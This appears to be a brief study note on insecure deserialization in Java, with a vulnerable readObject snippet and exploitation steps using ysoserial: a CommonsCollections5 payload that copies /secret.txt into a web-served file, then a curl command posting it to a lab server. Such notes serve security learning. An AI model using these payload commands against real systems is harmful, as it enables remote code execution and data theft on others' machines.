Insecure Desensitization

Insecure Desensitization happens in any object-oriented programming language that supports concept of serialization and deserialization. Commonly seen in Java, but can affect .NET, php, Ruby, and Python.

Serialization is the process of converting variables and objects in memory of a process into a format (stream of bytes) that can be stored or transmitted.

Deserialization is the process of converting a stream of bytes back into an object in memory of a currenty process.

Since serialized object is stored on the client side, an attacker can easily modify the serialized object. Searialized object is binary representation of the object, as long as we know how to parse (and modify) it, there is nothing preventing us from doing that.

Technologies that rely on selrialization:

• Remote Method Invocation (RMI)

• Java Management Extension (JMX)

• Java Message Service (JMS)

• Java Server Faces implementation (ViewState)

Custom implementation protocol:

InputStream is = request.getInputStream();
ObjectINputStream ois = new ObjectInputStream(oius);
ois.readObject();

Exploitation

Can modify sensitive parameters stored in serialized object.

Remote Code execution through insecure deserialization

Using ysoserial tool

java -jar ysoserial.jar [payload] '[command]'

Example

java -jar /usr/local/bin/ysoserial-master-SNAPSHOT.jar CommonsCollections5 'cp /secret.txt /opt/app/files/dummy.html' > deser.obj
base64 deser.obj > deser.b64

Send

curl -v --cookie SID=12345 --data-urlencode "obj=`cat deser-file.b64`" http://172.17.0.2:8080/API

Tools: ysoserial

Resources

GrrrDog /Java-Deserialization-Cheat-Sheet The cheat sheet about Java Deserialization vulnerabilities: https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet